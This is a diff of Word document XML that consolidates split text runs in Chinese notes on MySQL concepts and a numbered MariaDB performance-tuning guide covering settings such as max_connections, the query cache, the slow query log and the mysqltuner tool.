       </w:r>
       <w:r>
-        <w:t>mys</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ql</w:t>
+        <w:t>mysql</w:t>
       </w:r>
       <w:r>
         <w:t>服务。然后</w:t>
@@ -17751,10 +16915,7 @@
         <w:wordWrap w:val="0"/>
       </w:pPr>
       <w:r>
-        <w:t>数</w:t>
-      </w:r>
-      <w:r>
-        <w:t>据库连接池的使用，是对资源上限的设置，程序可以将数据暂时先保存在内存中，并在合适的时间内将数据提交到数据库中，比如</w:t>
+        <w:t>数据库连接池的使用，是对资源上限的设置，程序可以将数据暂时先保存在内存中，并在合适的时间内将数据提交到数据库中，比如</w:t>
       </w:r>
       <w:r>
         <w:t>spark</w:t>
@@ -17971,10 +17132,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>实</w:t>
-      </w:r>
-      <w:r>
-        <w:t>现自增</w:t>
+        <w:t>实现自增</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18098,10 +17256,7 @@
         <w:t>mysql</w:t>
       </w:r>
       <w:r>
-        <w:t>上层的优化比较多点，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>底层的存储引擎还是</w:t>
+        <w:t>上层的优化比较多点，底层的存储引擎还是</w:t>
       </w:r>
       <w:r>
         <w:t>percona</w:t>
@@ -18236,17 +17391,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>所支持的存储引擎</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>，以及从中得到</w:t>
+        <w:t>所支持的存储引擎，以及从中得到</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18504,10 +17649,7 @@
         <w:ind w:firstLine="420"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>MyIsam</w:t>
+        <w:t>1. MyIsam</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18660,13 +17802,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>ollback</w:t>
+        <w:t>rollback</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19125,10 +18261,7 @@
         <w:t>还是会正常的记录下</w:t>
       </w:r>
       <w:r>
-        <w:t>Binl</w:t>
-      </w:r>
-      <w:r>
-        <w:t>og</w:t>
+        <w:t>Binlog</w:t>
       </w:r>
       <w:r>
         <w:t>，而且这些</w:t>
@@ -19231,10 +18364,7 @@
         <w:t>3NF</w:t>
       </w:r>
       <w:r>
-        <w:t>）、第四范式</w:t>
-      </w:r>
-      <w:r>
-        <w:t>（</w:t>
+        <w:t>）、第四范式（</w:t>
       </w:r>
       <w:r>
         <w:t>4NF</w:t>
@@ -19357,10 +18487,7 @@
         <w:t>2NF</w:t>
       </w:r>
       <w:r>
-        <w:t>的表合在一起，插入的时候可能会缺乏数据，删</w:t>
-      </w:r>
-      <w:r>
-        <w:t>除的时候会删除意料之外的部分（两个表结合在一起），修改的时候会比较复杂。</w:t>
+        <w:t>的表合在一起，插入的时候可能会缺乏数据，删除的时候会删除意料之外的部分（两个表结合在一起），修改的时候会比较复杂。</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/mariadb.docx
+++ b/mariadb.docx
@@ -135,13 +135,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>/etc/my.cnf /etc/mysql/my.cnf ~</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>/.my.cnf</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>/etc/my.cnf /etc/mysql/my.cnf ~/.my.cnf</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -921,49 +916,25 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  where (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>new.dept</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">_name = 'Comp.Sci.') do instead </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">insert into </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>instructor(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>id, name, dept_name, salary)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  values (new.id, new.name, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>new.dept</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_name, new.salary);</w:t>
+        <w:t xml:space="preserve">  where (new.dept_name = 'Comp.Sci.') do instead </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>insert into instructor(id, name, dept_name, salary)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  values (new.id, new.name, new.dept_name, new.salary);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1382,39 +1353,647 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve"># sysctl </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>vm.swappiness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"># sysctl vm.swappiness </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>vm.swappiness = 60</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>运行以下命令关闭</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> swappiness</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># sysctl -w vm.swappiness=0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>4.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>设置</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的最大连接数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">max_connections </w:t>
+      </w:r>
+      <w:r>
+        <w:t>指令告诉你当前你的服务器允许多少并发连接。</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>服务器允许有</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SUPER </w:t>
+      </w:r>
+      <w:r>
+        <w:t>权限的用户在最大连接之外再建立一个连接。只有当执行</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>请求的时候才会建立连接，执行完成后会关闭连接并被新的连接取代。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>请记住，太多的连接会导致内存的使用量过高并且会锁住你的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>服务器。一般小网站需要</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 100-200 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的连接数，而较大可能需要</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 500-800 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>甚至更多。这里的值很大程度上取决于你</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的使用情况。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>你可以动态地改变</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> max_connections </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的值而无需重启</w:t>
+      </w:r>
+      <w:r>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>服务器：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># mysql -u root -p</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>mysql&gt; set global max_connections = 300;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>5.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的线程缓存数量（也就是线程池）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>要提高服务器的性能，你可以设置</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> thread_cache_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的值相对高一些。你可以通过以下方法来查看线程缓存命中率：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>mysql&gt; show status like 'Threads_created';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>mysql&gt; show status like 'Connections';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>你可以用以下公式来计算线程池的命中率：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>100 - ((Threads_created / Connections) * 100)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>如果你得到一个较低的数字，这意味着大多数</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> mysql </w:t>
+      </w:r>
+      <w:r>
+        <w:t>连接使用新的线程，而不是从缓存加载。在这种情况下，你需要增加</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> thread_cache_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>。这里有一个好处是可以动态地改变</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> thread_cache_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>而无需重启</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>服务。你可以通过以下方式来实现：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>mysql&gt; set global thread_cache_size = 16;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>6.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>禁用</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>对用户的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DNS </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>默认情况下当新的连接出现时，</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>会进行</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DNS </w:t>
+      </w:r>
+      <w:r>
+        <w:t>查询解析用户的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:r>
+        <w:t>地址</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>主机名。对于每个客户端连接，它的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:r>
+        <w:t>都会被解析为主机名。然后，主机名又被反解析为</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:r>
+        <w:t>来验证两者是否一致。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>当</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DNS </w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置错误或服务器出现问题时，这很可能会导致延迟。这就是为什么要关闭</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DNS </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的反向查询的原因，你可以在你的配置文件中添加以下选项去设定：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>[mysqld]  vim /etc/my.cnf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># Skip reverse DNS lookup of clients</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>skip-name-resolve</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>更改后你需要重启</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>服务。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>7.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的查询缓存容量</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>如果你有很多重复的查询并且数据不经常改变</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>请使用缓存查询。</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>vm.swappiness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 60</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>运行以下命令关闭</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> swappiness</w:t>
+      <w:r>
+        <w:t>人们常常不理解</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> query_cache_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的实际含义而将此值设置为</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> GB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>级，这实际上会降低服务器的性能。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>背后的原因是，在更新过程中线程需要锁定缓存。通常设置为</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 200-300 MB</w:t>
+      </w:r>
+      <w:r>
+        <w:t>应该足够了。如果你的网站比较小的，你可以尝试给</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 64M </w:t>
+      </w:r>
+      <w:r>
+        <w:t>并在以后及时去增加。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>在你的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置文件中添加以下设置：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>query_cache_type = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>query_cache_limit = 256K</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>query_cache_min_res_unit = 2k</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>query_cache_size = 80M</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>8.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置临时表容量和内存表最大容量</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">tmp_table_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> max_heap_table_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>这两个变量的大小应该相同，它们可以让你避免磁盘写入。</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> tmp_table_size </w:t>
+      </w:r>
+      <w:r>
+        <w:t>是内置内存表的最大空间。如果表的大小超出限值将会被转换为磁盘上的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MyISAM </w:t>
+      </w:r>
+      <w:r>
+        <w:t>表。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>这会影响数据库的性能。管理员通常建议在服务器上设置这两个值为每</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> GB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>内存给</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 64M</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>[mysqld]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>tmp_table_size= 64M</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>max_heap_table_size= 64M</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>9.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>启用</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>慢查询日志</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>记录慢查询可以帮助你定位数据库中的问题并帮助你调试。这可以通过在你的</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>配置文件中添加以下值来启用：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>slow-query-log = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>slow-query-log-file = /var/lib/mysql/mysql-slow.log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>long_query_time = 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>第一个变量启用慢查询日志，第二个告诉</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>实际的日志文件存储位置。使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> long_query_time </w:t>
+      </w:r>
+      <w:r>
+        <w:t>来定义完成</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>查询多少用时算长。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>10.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>检查</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的空闲连接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>空闲连接会消耗资源，可以的话应该被终止或者刷新。空闲连接是指处于</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> “sleep” </w:t>
+      </w:r>
+      <w:r>
+        <w:t>状态并且保持了很长一段时间的连接。你可以通过运行以下命令查看空闲连接：</w:t>
+      </w:r>
+      <w:r>
+        <w:t># mysqladmin processlist -u root -p | grep “Sleep”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>首先你要做的就是检查代码问题并修复它。如果你不能访问正在运行的代码，你可以修改</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> wait_timeout </w:t>
+      </w:r>
+      <w:r>
+        <w:t>变量。默认值是</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 28800 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>秒，而你可以安全地将其降低到</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> 60 </w:t>
       </w:r>
       <w:r>
         <w:t>：</w:t>
@@ -1423,20 +2002,120 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve"># sysctl -w </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>vm.swappiness</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=0</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>4.</w:t>
+        <w:t>wait_timeout=60</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>11.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>文件系统的选取</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>按照</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MariaDB </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的建议，最好的文件系统是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>XFS</w:t>
+      </w:r>
+      <w:r>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ext4 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>和</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Btrfs</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。它们都是可以使用超大文件和大容量存储卷的企业级日志型文件系统。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>下面你可以找到一些关于这三个文件系统的有用信息：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>文件系统</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>XFS</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>Ext4</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>Btrfs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>文件系统最大容量</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>8EB</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>1EB</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>16EB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>最大文件大小</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>8EB</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>16TB</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>16EB</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>12.</w:t>
       </w:r>
       <w:r>
         <w:t>设置</w:t>
@@ -1445,883 +2124,144 @@
         <w:t xml:space="preserve"> MySQL </w:t>
       </w:r>
       <w:r>
-        <w:t>的最大连接数</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">max_connections </w:t>
-      </w:r>
-      <w:r>
-        <w:t>指令告诉你当前你的服务器允许多少并发连接。</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
-      </w:r>
-      <w:r>
-        <w:t>服务器允许有</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SUPER </w:t>
-      </w:r>
-      <w:r>
-        <w:t>权限的用户在最大连接之外再建立一个连接。只有当执行</w:t>
+        <w:t>允许的最大数据包</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>把数据拆分成包。通常一个包就是发送到客户端的一行数据。</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> max_allowed_packet </w:t>
+      </w:r>
+      <w:r>
+        <w:t>变量定义了可以被发送的最大的包。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> MySQL </w:t>
       </w:r>
       <w:r>
-        <w:t>请求的时候才会建立连接，执行完成后会关闭连接并被新的连接取代。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>请记住，太多的连接会导致内存的使用量过高并且会锁住你的</w:t>
+        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> MySQL </w:t>
       </w:r>
       <w:r>
-        <w:t>服务器。一般小网站需要</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 100-200 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的连接数，而较大可能需要</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 500-800 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>甚至更多。这里的值很大程度上取决于你</w:t>
+        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>13.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>测试</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的性能优化</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>有大量的测试工具可用，但我推荐你一个简单易用的。该工具被称为</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> mysqltuner</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>使用下面的命令下载并运行它：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># wget https://github.com/major/MySQLTuner-perl/tarball/master</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># tar xf master</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t># cd major-MySQLTuner-perl-993bc18/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve"># ./mysqltuner.pl </w:t>
